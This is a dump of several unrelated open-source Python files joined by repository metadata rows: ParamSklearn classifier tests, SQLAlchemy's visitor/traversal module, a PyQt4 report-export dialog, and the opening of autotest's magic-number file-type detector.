if config['classifier:passive_aggressive:n_iter'] is not None:
config._values['classifier:passive_aggressive:n_iter'] = 5
if config['classifier:sgd:n_iter'] is not None:
config._values['classifier:sgd:n_iter'] = 5
print(config)
categorical = [True, True, True, False, False, True, True, True,
False, True, True, True, True, True, True, True,
True, True, True, True, True, True, True, True, True,
True, True, True, True, True, True, True, False,
False, False, True, True, True]
this_directory = os.path.dirname(__file__)
X = np.loadtxt(os.path.join(this_directory, "components",
"data_preprocessing", "dataset.pkl"))
y = X[:, -1].copy()
X = X[:,:-1]
X_train, X_test, Y_train, Y_test = \
sklearn.cross_validation.train_test_split(X, y)
cls = ParamSklearnClassifier(config, random_state=1,)
try:
cls.fit(X_train, Y_train,
init_params={'one_hot_encoding:categorical_features': categorical})
predictions = cls.predict(X_test)
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
traceback.print_tb(sys.exc_info()[2])
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
raise e
def test_get_hyperparameter_search_space(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
self.assertIsInstance(cs, ConfigurationSpace)
conditions = cs.get_conditions()
self.assertEqual(len(cs.get_hyperparameter(
'rescaling:__choice__').choices), 4)
self.assertEqual(len(cs.get_hyperparameter(
'classifier:__choice__').choices), 16)
self.assertEqual(len(cs.get_hyperparameter(
'preprocessor:__choice__').choices), 14)
hyperparameters = cs.get_hyperparameters()
self.assertEqual(145, len(hyperparameters))
#for hp in sorted([str(h) for h in hyperparameters]):
# print hp
# The four parameters which are always active are classifier,
# preprocessor, imputation strategy and scaling strategy
self.assertEqual(len(hyperparameters) - 6, len(conditions))
def test_get_hyperparameter_search_space_include_exclude_models(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
include={'classifier': ['libsvm_svc']})
self.assertEqual(cs.get_hyperparameter('classifier:__choice__'),
CategoricalHyperparameter('classifier:__choice__', ['libsvm_svc']))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
exclude={'classifier': ['libsvm_svc']})
self.assertNotIn('libsvm_svc', str(cs))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
include={'preprocessor': ['select_percentile_classification']})
self.assertEqual(cs.get_hyperparameter('preprocessor:__choice__'),
CategoricalHyperparameter('preprocessor:__choice__',
['select_percentile_classification']))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
exclude={'preprocessor': ['select_percentile_classification']})
self.assertNotIn('select_percentile_classification', str(cs))
def test_get_hyperparameter_search_space_preprocessor_contradicts_default_classifier(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
include={'preprocessor': ['densifier']},
dataset_properties={'sparse': True})
self.assertEqual(cs.get_hyperparameter('classifier:__choice__').default,
'qda')
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
include={'preprocessor': ['nystroem_sampler']})
self.assertEqual(cs.get_hyperparameter('classifier:__choice__').default,
'sgd')
def test_get_hyperparameter_search_space_only_forbidden_combinations(self):
self.assertRaisesRegexp(AssertionError, "No valid pipeline found.",
ParamSklearnClassifier.get_hyperparameter_search_space,
include={'classifier': ['multinomial_nb'],
'preprocessor': ['pca']},
dataset_properties={'sparse':True})
        # It must also be ensured that no classifiers which can handle sparse
# data are located behind the densifier
self.assertRaisesRegexp(ValueError, "Cannot find a legal default "
"configuration.",
ParamSklearnClassifier.get_hyperparameter_search_space,
include={'classifier': ['liblinear_svc'],
'preprocessor': ['densifier']},
dataset_properties={'sparse': True})
@unittest.skip("Wait until HPOlibConfigSpace is fixed.")
def test_get_hyperparameter_search_space_dataset_properties(self):
cs_mc = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'multiclass': True})
self.assertNotIn('bernoulli_nb', str(cs_mc))
cs_ml = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'multilabel': True})
self.assertNotIn('k_nearest_neighbors', str(cs_ml))
self.assertNotIn('liblinear', str(cs_ml))
self.assertNotIn('libsvm_svc', str(cs_ml))
self.assertNotIn('sgd', str(cs_ml))
cs_sp = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
self.assertIn('extra_trees', str(cs_sp))
self.assertIn('gradient_boosting', str(cs_sp))
self.assertIn('random_forest', str(cs_sp))
cs_mc_ml = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'multilabel': True, 'multiclass': True})
self.assertEqual(cs_ml, cs_mc_ml)
def test_predict_batched(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
default = cs.get_default_configuration()
cls = ParamSklearnClassifier(default)
# Multiclass
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_)
cls.pipeline_ = cls_predict
prediction = cls.predict(X_test, batch_size=20)
self.assertEqual((1647,), prediction.shape)
self.assertEqual(83, cls_predict.predict.call_count)
assert_array_almost_equal(prediction_, prediction)
# Multilabel
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
Y_train = np.array([(y, 26 - y) for y in Y_train])
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_)
cls.pipeline_ = cls_predict
prediction = cls.predict(X_test, batch_size=20)
self.assertEqual((1647, 2), prediction.shape)
self.assertEqual(83, cls_predict.predict.call_count)
assert_array_almost_equal(prediction_, prediction)
def test_predict_batched_sparse(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
config = Configuration(cs,
values={"balancing:strategy": "none",
"classifier:__choice__": "random_forest",
"imputation:strategy": "mean",
"one_hot_encoding:minimum_fraction": 0.01,
"one_hot_encoding:use_minimum_fraction": "True",
"preprocessor:__choice__": "no_preprocessing",
'classifier:random_forest:bootstrap': 'True',
'classifier:random_forest:criterion': 'gini',
'classifier:random_forest:max_depth': 'None',
'classifier:random_forest:min_samples_split': 2,
'classifier:random_forest:min_samples_leaf': 2,
'classifier:random_forest:max_features': 0.5,
'classifier:random_forest:max_leaf_nodes': 'None',
'classifier:random_forest:n_estimators': 100,
'classifier:random_forest:min_weight_fraction_leaf': 0.0,
"rescaling:__choice__": "min/max"})
cls = ParamSklearnClassifier(config)
# Multiclass
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_)
cls.pipeline_ = cls_predict
prediction = cls.predict(X_test, batch_size=20)
self.assertEqual((1647,), prediction.shape)
self.assertEqual(83, cls_predict.predict.call_count)
assert_array_almost_equal(prediction_, prediction)
# Multilabel
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
Y_train = np.array([(y, 26 - y) for y in Y_train])
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_)
cls.pipeline_ = cls_predict
prediction = cls.predict(X_test, batch_size=20)
self.assertEqual((1647, 2), prediction.shape)
self.assertEqual(83, cls_predict.predict.call_count)
assert_array_almost_equal(prediction_, prediction)
def test_predict_proba_batched(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
default = cs.get_default_configuration()
# Multiclass
cls = ParamSklearnClassifier(default)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict_proba(X_test_)
# The object behind the last step in the pipeline
cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1])
cls.pipeline_.steps[-1] = ("estimator", cls_predict)
prediction = cls.predict_proba(X_test, batch_size=20)
self.assertEqual((1647, 10), prediction.shape)
self.assertEqual(84, cls_predict.predict_proba.call_count)
assert_array_almost_equal(prediction_, prediction)
# Multilabel
cls = ParamSklearnClassifier(default)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
Y_train = np.array([(y, 26 - y) for y in Y_train])
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict_proba(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1])
cls.pipeline_.steps[-1] = ("estimator", cls_predict)
prediction = cls.predict_proba(X_test, batch_size=20)
self.assertIsInstance(prediction, list)
self.assertEqual(2, len(prediction))
self.assertEqual((1647, 10), prediction[0].shape)
self.assertEqual((1647, 10), prediction[1].shape)
self.assertEqual(84, cls_predict.predict_proba.call_count)
assert_array_almost_equal(prediction_, prediction)
def test_predict_proba_batched_sparse(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
config = Configuration(cs,
values={"balancing:strategy": "none",
"classifier:__choice__": "random_forest",
"imputation:strategy": "mean",
"one_hot_encoding:minimum_fraction": 0.01,
"one_hot_encoding:use_minimum_fraction": 'True',
"preprocessor:__choice__": "no_preprocessing",
'classifier:random_forest:bootstrap': 'True',
'classifier:random_forest:criterion': 'gini',
'classifier:random_forest:max_depth': 'None',
'classifier:random_forest:min_samples_split': 2,
'classifier:random_forest:min_samples_leaf': 2,
'classifier:random_forest:min_weight_fraction_leaf': 0.0,
'classifier:random_forest:max_features': 0.5,
'classifier:random_forest:max_leaf_nodes': 'None',
'classifier:random_forest:n_estimators': 100,
"rescaling:__choice__": "min/max"})
# Multiclass
cls = ParamSklearnClassifier(config)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict_proba(X_test_)
# The object behind the last step in the pipeline
cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1])
cls.pipeline_.steps[-1] = ("estimator", cls_predict)
prediction = cls.predict_proba(X_test, batch_size=20)
self.assertEqual((1647, 10), prediction.shape)
self.assertEqual(84, cls_predict.predict_proba.call_count)
assert_array_almost_equal(prediction_, prediction)
# Multilabel
cls = ParamSklearnClassifier(config)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
Y_train = np.array([(y, 26 - y) for y in Y_train])
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
prediction_ = cls.predict_proba(X_test_)
cls_predict = mock.Mock(wraps=cls.pipeline_.steps[-1][1])
cls.pipeline_.steps[-1] = ("estimator", cls_predict)
prediction = cls.predict_proba(X_test, batch_size=20)
self.assertIsInstance(prediction, list)
self.assertEqual(2, len(prediction))
self.assertEqual((1647, 10), prediction[0].shape)
self.assertEqual((1647, 10), prediction[1].shape)
self.assertEqual(84, cls_predict.predict_proba.call_count)
assert_array_almost_equal(prediction_, prediction)
@unittest.skip("test_check_random_state Not yet Implemented")
def test_check_random_state(self):
raise NotImplementedError()
@unittest.skip("test_validate_input_X Not yet Implemented")
def test_validate_input_X(self):
raise NotImplementedError()
@unittest.skip("test_validate_input_Y Not yet Implemented")
def test_validate_input_Y(self):
raise NotImplementedError()
def test_set_params(self):
pass
def test_get_params(self):
pass
| bsd-3-clause | 5,577,714,242,644,063,000 | 44.762811 | 106 | 0.551766 | false |
Drvanon/Game | venv/lib/python3.3/site-packages/sqlalchemy/sql/visitors.py | 1 | 10003 | # sql/visitors.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Visitor/traversal interface and library functions.
SQLAlchemy schema and expression constructs rely on a Python-centric
version of the classic "visitor" pattern as the primary way in which
they apply functionality. The most common use of this pattern
is statement compilation, where individual expression classes match
up to rendering methods that produce a string result. Beyond this,
the visitor system is also used to inspect expressions for various
information and patterns, as well as for usage in
some kinds of expression transformation. Other kinds of transformation
use a non-visitor traversal system.
For many examples of how the visit system is used, see the
sqlalchemy.sql.util and the sqlalchemy.sql.compiler modules.
For an introduction to clause adaption, see
http://techspot.zzzeek.org/2008/01/23/expression-transformations/
"""
from collections import deque
from .. import util
import operator
from .. import exc
__all__ = ['VisitableType', 'Visitable', 'ClauseVisitor',
'CloningVisitor', 'ReplacingCloningVisitor', 'iterate',
'iterate_depthfirst', 'traverse_using', 'traverse',
'cloned_traverse', 'replacement_traverse']
class VisitableType(type):
"""Metaclass which assigns a `_compiler_dispatch` method to classes
having a `__visit_name__` attribute.
The _compiler_dispatch attribute becomes an instance method which
looks approximately like the following::
def _compiler_dispatch (self, visitor, **kw):
'''Look for an attribute named "visit_" + self.__visit_name__
on the visitor, and call it with the same kw params.'''
visit_attr = 'visit_%s' % self.__visit_name__
return getattr(visitor, visit_attr)(self, **kw)
Classes having no __visit_name__ attribute will remain unaffected.
"""
def __init__(cls, clsname, bases, clsdict):
if cls.__name__ == 'Visitable' or not hasattr(cls, '__visit_name__'):
super(VisitableType, cls).__init__(clsname, bases, clsdict)
return
_generate_dispatch(cls)
super(VisitableType, cls).__init__(clsname, bases, clsdict)
def _generate_dispatch(cls):
"""Return an optimized visit dispatch function for the cls
for use by the compiler.
"""
if '__visit_name__' in cls.__dict__:
visit_name = cls.__visit_name__
if isinstance(visit_name, str):
# There is an optimization opportunity here because the
# string name of the class's __visit_name__ is known at
# this early stage (import time) so it can be pre-constructed.
getter = operator.attrgetter("visit_%s" % visit_name)
def _compiler_dispatch(self, visitor, **kw):
try:
meth = getter(visitor)
except AttributeError:
raise exc.UnsupportedCompilationError(visitor, cls)
else:
return meth(self, **kw)
else:
# The optimization opportunity is lost for this case because the
# __visit_name__ is not yet a string. As a result, the visit
# string has to be recalculated with each compilation.
def _compiler_dispatch(self, visitor, **kw):
visit_attr = 'visit_%s' % self.__visit_name__
try:
meth = getattr(visitor, visit_attr)
except AttributeError:
raise exc.UnsupportedCompilationError(visitor, cls)
else:
return meth(self, **kw)
_compiler_dispatch.__doc__ = \
"""Look for an attribute named "visit_" + self.__visit_name__
on the visitor, and call it with the same kw params.
"""
cls._compiler_dispatch = _compiler_dispatch
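# Illustrative sketch (not part of the original module): for a class whose
# __visit_name__ is "select", the pre-built dispatcher above behaves like the
# per-call lookup below, except that the attribute getter is constructed once
# at class-creation time rather than on every dispatch:
#
#     getter = operator.attrgetter("visit_select")   # built once
#     meth = getter(visitor)                         # same as getattr(visitor, "visit_select")
#     return meth(element, **kw)                     # 'element' is the visited clause (self)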
class Visitable(object, metaclass=VisitableType):
"""Base class for visitable objects, applies the
``VisitableType`` metaclass.
"""
class ClauseVisitor(object):
"""Base class for visitor objects which can traverse using
the traverse() function.
"""
__traverse_options__ = {}
def traverse_single(self, obj, **kw):
for v in self._visitor_iterator:
meth = getattr(v, "visit_%s" % obj.__visit_name__, None)
if meth:
return meth(obj, **kw)
def iterate(self, obj):
"""traverse the given expression structure, returning an iterator
of all elements.
"""
return iterate(obj, self.__traverse_options__)
def traverse(self, obj):
"""traverse and visit the given expression structure."""
return traverse(obj, self.__traverse_options__, self._visitor_dict)
@util.memoized_property
def _visitor_dict(self):
visitors = {}
for name in dir(self):
if name.startswith('visit_'):
visitors[name[6:]] = getattr(self, name)
return visitors
@property
def _visitor_iterator(self):
"""iterate through this visitor and each 'chained' visitor."""
v = self
while v:
yield v
v = getattr(v, '_next', None)
def chain(self, visitor):
"""'chain' an additional ClauseVisitor onto this ClauseVisitor.
the chained visitor will receive all visit events after this one.
"""
tail = list(self._visitor_iterator)[-1]
tail._next = visitor
return self
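# Hedged usage sketch (the names below are assumptions, not part of this
# module): a concrete visitor defines ``visit_<visit_name>`` methods and calls
# ``traverse`` on an expression, e.g. to collect Column objects:
#
#     class ColumnCollector(ClauseVisitor):
#         def __init__(self):
#             self.columns = []
#         def visit_column(self, column):
#             self.columns.append(column)
#
#     collector = ColumnCollector()
#     collector.traverse(some_select_statement)   # 'some_select_statement' is assumed
#     print(collector.columns)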
class CloningVisitor(ClauseVisitor):
"""Base class for visitor objects which can traverse using
the cloned_traverse() function.
"""
def copy_and_process(self, list_):
"""Apply cloned traversal to the given list of elements, and return
the new list.
"""
return [self.traverse(x) for x in list_]
def traverse(self, obj):
"""traverse and visit the given expression structure."""
return cloned_traverse(
obj, self.__traverse_options__, self._visitor_dict)
class ReplacingCloningVisitor(CloningVisitor):
"""Base class for visitor objects which can traverse using
the replacement_traverse() function.
"""
def replace(self, elem):
"""receive pre-copied elements during a cloning traversal.
If the method returns a new element, the element is used
instead of creating a simple copy of the element. Traversal
will halt on the newly returned element if it is re-encountered.
"""
return None
def traverse(self, obj):
"""traverse and visit the given expression structure."""
def replace(elem):
for v in self._visitor_iterator:
e = v.replace(elem)
if e is not None:
return e
return replacement_traverse(obj, self.__traverse_options__, replace)
def iterate(obj, opts):
"""traverse the given expression structure, returning an iterator.
traversal is configured to be breadth-first.
"""
stack = deque([obj])
while stack:
t = stack.popleft()
yield t
for c in t.get_children(**opts):
stack.append(c)
def iterate_depthfirst(obj, opts):
"""traverse the given expression structure, returning an iterator.
traversal is configured to be depth-first.
"""
stack = deque([obj])
traversal = deque()
while stack:
t = stack.pop()
traversal.appendleft(t)
for c in t.get_children(**opts):
stack.append(c)
return iter(traversal)
def traverse_using(iterator, obj, visitors):
"""visit the given expression structure using the given iterator of
objects.
"""
for target in iterator:
meth = visitors.get(target.__visit_name__, None)
if meth:
meth(target)
return obj
def traverse(obj, opts, visitors):
"""traverse and visit the given expression structure using the default
iterator.
"""
return traverse_using(iterate(obj, opts), obj, visitors)
def traverse_depthfirst(obj, opts, visitors):
"""traverse and visit the given expression structure using the
depth-first iterator.
"""
return traverse_using(iterate_depthfirst(obj, opts), obj, visitors)
def cloned_traverse(obj, opts, visitors):
"""clone the given expression structure, allowing
modifications by visitors."""
cloned = util.column_dict()
stop_on = util.column_set(opts.get('stop_on', []))
def clone(elem):
if elem in stop_on:
return elem
else:
if id(elem) not in cloned:
cloned[id(elem)] = newelem = elem._clone()
newelem._copy_internals(clone=clone)
meth = visitors.get(newelem.__visit_name__, None)
if meth:
meth(newelem)
return cloned[id(elem)]
if obj is not None:
obj = clone(obj)
return obj
def replacement_traverse(obj, opts, replace):
"""clone the given expression structure, allowing element
replacement by a given replacement function."""
cloned = util.column_dict()
stop_on = util.column_set([id(x) for x in opts.get('stop_on', [])])
def clone(elem, **kw):
if id(elem) in stop_on or \
'no_replacement_traverse' in elem._annotations:
return elem
else:
newelem = replace(elem)
if newelem is not None:
stop_on.add(id(newelem))
return newelem
else:
if elem not in cloned:
cloned[elem] = newelem = elem._clone()
newelem._copy_internals(clone=clone, **kw)
return cloned[elem]
if obj is not None:
obj = clone(obj, **opts)
return obj
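# Hedged usage sketch (the element names are assumptions): replacement_traverse()
# clones a clause while swapping out selected elements; the replace callable
# returns a replacement element, or None to keep the original:
#
#     def replace(element):
#         if element is old_table:          # 'old_table' / 'new_table' are assumed
#             return new_table
#         return None
#
#     new_clause = replacement_traverse(some_clause, {}, replace)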
| apache-2.0 | 6,985,493,977,411,155,000 | 30.755556 | 84 | 0.615615 | false |
tedlaz/pyted | tests/pyappgen/pyappgen/qtreports.py | 1 | 3002 | # -*- coding: utf-8 -*-
'''
Created on 2014-01-24
@author: tedlaz
'''
from PyQt4 import QtGui, Qt
class rptDlg(QtGui.QDialog):
def __init__(self, html=u'Δοκιμή', title='Document1', parent=None):
super(rptDlg, self).__init__(parent)
self.setAttribute(Qt.Qt.WA_DeleteOnClose)
self.odtName = '%s.odt' % title
self.pdfName = '%s.pdf' % title
self.setWindowTitle(title)
self.editor = QtGui.QTextEdit(self)
self.editor.setFont(QtGui.QFont('Arial',12))
self.buttonPdf = QtGui.QPushButton(u'Εξαγωγή σε pdf', self)
self.buttonPdf.clicked.connect(self.saveAsPdf)
self.buttonOdt = QtGui.QPushButton(u'Εξαγωγή σε odt', self)
self.buttonOdt.clicked.connect(self.saveAsOdt)
self.buttonPreview = QtGui.QPushButton(u'Προεπισκόπιση', self)
self.buttonPreview.clicked.connect(self.handlePreview)
layout = QtGui.QGridLayout(self)
layout.addWidget(self.editor, 0, 0, 1, 3)
layout.addWidget(self.buttonPdf, 1, 0)
layout.addWidget(self.buttonOdt, 1, 1)
layout.addWidget(self.buttonPreview, 1, 2)
self.editor.setHtml(html)
def handlePrint(self):
dialog = QtGui.QPrintDialog()
if dialog.exec_() == QtGui.QDialog.Accepted:
self.editor.document().print_(dialog.printer())
def saveAsPdf(self):
fname = '%s' % QtGui.QFileDialog.getSaveFileName(self,
u"Αποθήκευση σε μορφή pdf",
self.pdfName,
"pdf (*.pdf)")
if fname:
printer = QtGui.QPrinter()
printer.setOutputFormat(QtGui.QPrinter.PdfFormat)
printer.setOutputFileName(fname)
self.editor.document().print_(printer)
def saveAsOdt(self):
fname = '%s' % QtGui.QFileDialog.getSaveFileName(self,
u"Αποθήκευση σε μορφή Libre Office (odt)",
self.odtName,
"Libre Office (*.odt)")
if fname:
doc = QtGui.QTextDocument()
cursor = QtGui.QTextCursor(doc)
cursor.insertHtml(self.editor.toHtml())
writer = QtGui.QTextDocumentWriter()
odf_format = writer.supportedDocumentFormats()[1]
writer.setFormat(odf_format)
writer.setFileName(fname)
writer.write(doc)
def handlePreview(self):
dialog = QtGui.QPrintPreviewDialog()
dialog.paintRequested.connect(self.editor.print_)
dialog.exec_()
if __name__ == "__main__":
import sys
import test_printHtml
app = QtGui.QApplication(sys.argv)
window = rptDlg(test_printHtml.toHtml(),test_printHtml.reportTitle)
window.resize(640, 480)
window.show()
sys.exit(app.exec_()) | gpl-3.0 | 1,066,857,860,350,338,000 | 32.104651 | 71 | 0.574207 | false |
libvirt/autotest | client/common_lib/magic.py | 1 | 58623 | #!/usr/bin/python
"""
Library used to determine a file MIME type by its magic number; it doesn't have
any external dependencies. Based on the work of Jason Petrone ([email protected]),
adapted to autotest.
Command Line Usage: Running as 'python magic.py file_path' will print a
mime string (or just a description) of the file at file_path.
API Usage:
magic.guess_type(file_path) - Returns a description of what the file at
'file_path' contains. This function name was chosen due to the similar
function in the Python standard library module 'mimetypes'.
@license: GPL v2
@copyright: Jason Petrone ([email protected]) 2000
@copyright: Lucas Meneghel Rodrigues ([email protected]) 2010
@see: http://www.jsnp.net/code/magic.py
"""
import logging, optparse, os, re, sys, string, struct
import logging_config, logging_manager
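# Example usage, following the module docstring above (the path and the
# resulting mime string are illustrative; the exact value returned depends on
# the matching magic_database entry):
#
#     $ python magic.py /path/to/archive.tar.gz
#     application/x-gzip
#
#     >>> import magic
#     >>> magic.guess_type('/path/to/archive.tar.gz')
#     'application/x-gzip'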
def _str_to_num(n):
"""
Convert a hex or octal string to a decimal number.
@param n: Hex or octal string to be converted.
@return: Resulting decimal number.
"""
val = 0
col = long(1)
if n[:1] == 'x': n = '0' + n
if n[:2] == '0x':
# hex
n = string.lower(n[2:])
while len(n) > 0:
l = n[len(n) - 1]
val = val + string.hexdigits.index(l) * col
col = col * 16
n = n[:len(n)-1]
elif n[0] == '\\':
# octal
n = n[1:]
while len(n) > 0:
l = n[len(n) - 1]
if ord(l) < 48 or ord(l) > 57:
break
val = val + int(l) * col
col = col * 8
n = n[:len(n)-1]
else:
val = string.atol(n)
return val
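# A few illustrative conversions for _str_to_num (sketch, not exhaustive):
#
#     _str_to_num('0x1a') == 26     # hexadecimal
#     _str_to_num('x1a') == 26      # bare 'x' prefix is normalized to '0x' above
#     _str_to_num('\\12') == 10     # leading backslash marks an octal value
#     _str_to_num('123') == 123     # anything else is parsed as decimal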
class MagicLoggingConfig(logging_config.LoggingConfig):
def configure_logging(self, results_dir=None, verbose=False):
super(MagicLoggingConfig, self).configure_logging(use_console=True,
verbose=verbose)
class MagicTest(object):
"""
Compile a magic database entry so it can be compared with data read from
files.
"""
def __init__(self, offset, t, op, value, msg, mask=None):
"""
Reads magic database data. Maps the list fields into class attributes.
@param offset: Offset from start of the file.
@param t: Type of the magic data.
@param op: Operation to be performed when comparing the data.
@param value: Expected value of the magic data for a given data type.
@param msg: String representing the file mimetype.
"""
if t.count('&') > 0:
mask = _str_to_num(t[t.index('&')+1:])
t = t[:t.index('&')]
if type(offset) == type('a'):
self.offset = _str_to_num(offset)
else:
self.offset = offset
self.type = t
self.msg = msg
self.subTests = []
self.op = op
self.mask = mask
self.value = value
def test(self, data):
"""
Compare data read from file with self.value if operator is '='.
@param data: Data read from the file.
@return: None if the data does not match the expected value. Otherwise,
the matching mime type string (self.msg).
"""
if self.mask:
data = data & self.mask
if self.op == '=':
if self.value == data:
return self.msg
elif self.op == '<':
pass
elif self.op == '>':
pass
elif self.op == '&':
pass
elif self.op == '^':
pass
return None
def compare(self, data):
"""
Compare data read from the file with the expected data for this
particular mime type entry.
@param data: Data read from the file.
@return: Mime type string if the data matches this entry, None otherwise.
"""
try:
if self.type == 'string':
c = ''; s = ''
for i in range(0, len(self.value)+1):
if i + self.offset > len(data) - 1: break
s = s + c
[c] = struct.unpack('c', data[self.offset + i])
data = s
elif self.type == 'short':
[data] = struct.unpack('h', data[self.offset:self.offset + 2])
elif self.type == 'leshort':
[data] = struct.unpack('<h', data[self.offset:self.offset + 2])
elif self.type == 'beshort':
[data] = struct.unpack('>H', data[self.offset:self.offset + 2])
elif self.type == 'long':
[data] = struct.unpack('l', data[self.offset:self.offset + 4])
elif self.type == 'lelong':
[data] = struct.unpack('<l', data[self.offset:self.offset + 4])
elif self.type == 'belong':
[data] = struct.unpack('>l', data[self.offset:self.offset + 4])
else:
pass
except Exception:
return None
return self.test(data)
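# Hedged sketch of how an entry is evaluated (the file path is an assumption):
# each row of magic_database below maps to MagicTest(offset, type, op, value, msg)
# and compare() checks it against the raw bytes read from the start of a file.
#
#     zip_test = MagicTest(0L, 'string', '=', 'PK\003\004', 'application/zip')
#     data = open('/path/to/archive.zip', 'rb').read(8192)
#     print zip_test.compare(data)    # 'application/zip' on a match, None otherwise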
magic_database = [
[0L, 'leshort', '=', 1538L, 'application/x-alan-adventure-game'],
[0L, 'string', '=', 'TADS', 'application/x-tads-game'],
[0L, 'short', '=', 420L, 'application/x-executable-file'],
[0L, 'short', '=', 421L, 'application/x-executable-file'],
[0L, 'leshort', '=', 603L, 'application/x-executable-file'],
[0L, 'string', '=', 'Core\001', 'application/x-executable-file'],
[0L, 'string', '=', 'AMANDA: TAPESTART DATE', 'application/x-amanda-header'],
[0L, 'belong', '=', 1011L, 'application/x-executable-file'],
[0L, 'belong', '=', 999L, 'application/x-library-file'],
[0L, 'belong', '=', 435L, 'video/mpeg'],
[0L, 'belong', '=', 442L, 'video/mpeg'],
[0L, 'beshort&0xfff0', '=', 65520L, 'audio/mpeg'],
[4L, 'leshort', '=', 44817L, 'video/fli'],
[4L, 'leshort', '=', 44818L, 'video/flc'],
[0L, 'string', '=', 'MOVI', 'video/x-sgi-movie'],
[4L, 'string', '=', 'moov', 'video/quicktime'],
[4L, 'string', '=', 'mdat', 'video/quicktime'],
[0L, 'long', '=', 100554L, 'application/x-apl-workspace'],
[0L, 'string', '=', 'FiLeStArTfIlEsTaRt', 'text/x-apple-binscii'],
[0L, 'string', '=', '\012GL', 'application/data'],
[0L, 'string', '=', 'v\377', 'application/data'],
[0L, 'string', '=', 'NuFile', 'application/data'],
[0L, 'string', '=', 'N\365F\351l\345', 'application/data'],
[0L, 'belong', '=', 333312L, 'application/data'],
[0L, 'belong', '=', 333319L, 'application/data'],
[257L, 'string', '=', 'ustar\000', 'application/x-tar'],
[257L, 'string', '=', 'ustar \000', 'application/x-gtar'],
[0L, 'short', '=', 70707L, 'application/x-cpio'],
[0L, 'short', '=', 143561L, 'application/x-bcpio'],
[0L, 'string', '=', '070707', 'application/x-cpio'],
[0L, 'string', '=', '070701', 'application/x-cpio'],
[0L, 'string', '=', '070702', 'application/x-cpio'],
[0L, 'string', '=', '!<arch>\012debian', 'application/x-dpkg'],
[0L, 'string', '=', '\xed\xab\xee\xdb', 'application/x-rpm'],
[0L, 'long', '=', 177555L, 'application/x-ar'],
[0L, 'short', '=', 177555L, 'application/data'],
[0L, 'long', '=', 177545L, 'application/data'],
[0L, 'short', '=', 177545L, 'application/data'],
[0L, 'long', '=', 100554L, 'application/x-apl-workspace'],
[0L, 'string', '=', '<ar>', 'application/x-ar'],
[0L, 'string', '=', '!<arch>\012__________E', 'application/x-ar'],
[0L, 'string', '=', '-h-', 'application/data'],
[0L, 'string', '=', '!<arch>', 'application/x-ar'],
[0L, 'string', '=', '<ar>', 'application/x-ar'],
[0L, 'string', '=', '<ar>', 'application/x-ar'],
[0L, 'belong', '=', 1711210496L, 'application/x-ar'],
[0L, 'belong', '=', 1013019198L, 'application/x-ar'],
[0L, 'long', '=', 557605234L, 'application/x-ar'],
[0L, 'lelong', '=', 177555L, 'application/data'],
[0L, 'leshort', '=', 177555L, 'application/data'],
[0L, 'lelong', '=', 177545L, 'application/data'],
[0L, 'leshort', '=', 177545L, 'application/data'],
[0L, 'lelong', '=', 236525L, 'application/data'],
[0L, 'lelong', '=', 236526L, 'application/data'],
[0L, 'lelong&0x8080ffff', '=', 2074L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 2330L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 538L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 794L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 1050L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 1562L, 'application/x-arc'],
